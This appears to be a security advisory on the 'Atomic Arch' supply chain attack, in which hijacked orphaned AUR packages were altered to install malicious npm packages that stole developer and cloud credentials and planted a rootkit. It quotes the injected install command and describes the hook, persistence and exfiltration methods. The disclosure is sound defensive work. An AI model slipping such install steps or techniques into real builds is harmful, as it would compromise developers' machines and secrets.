Researchers have disclosed a software supply chain attack, dubbed "Atomic Arch," targeting orphaned packages in the Arch User Repository (AUR). Using newly created AUR accounts, an attacker adopted more than 400 abandoned packages through the legitimate maintainer-handoff mechanism and modified each package's build script (PKGBUILD) - leaving the original software untouched - to run npm install atomic-lockfile during installation. The exact install line varies by package, with legitimate packages such as minimist, chalk, axios, got, or yargs included as camouflage, and a second malicious package, js-digest, observed in some variants.
The npm package atomic-lockfile is purpose-built malware. It defines an npm preinstall lifecycle hook that automatically executes a bundled Linux ELF binary (src/hooks/deps) during installation. The payload is a credential stealer aimed at developer, CI/CD, and build environments: it harvests browser and Electron application data (cookies, Slack, Microsoft Teams, Discord) and developer and cloud secrets, including GitHub tokens, npm tokens, SSH keys, Docker/Podman credentials, and HashiCorp Vault tokens. When executed as root, it deploys an eBPF-based rootkit to hide its processes, files, and sockets, and establishes persistence through systemd service units. Collected data is exfiltrated to the file-sharing service temp.sh, with command and control over a Tor onion service (POST /api/agent).
While the AUR delivery vector affects only Arch Linux users, the malicious package resides on the public npm registry, so exposure is operating-system independent; payload execution, however, is limited to Linux hosts (the payload is a Linux ELF), which aligns with cloud build hosts, CI runners, and containers. The official Arch Linux package repositories are not affected. The malicious atomic-lockfile (1.4.2) and js-digest (4.2.2) packages were removed from the npm registry and the affected AUR packages reverted, closing the window for new infections (approximately June 10–12, 2026). Hosts that installed either package during this window should be treated as compromised, as uninstalling the package does not remediate an already-executed payload.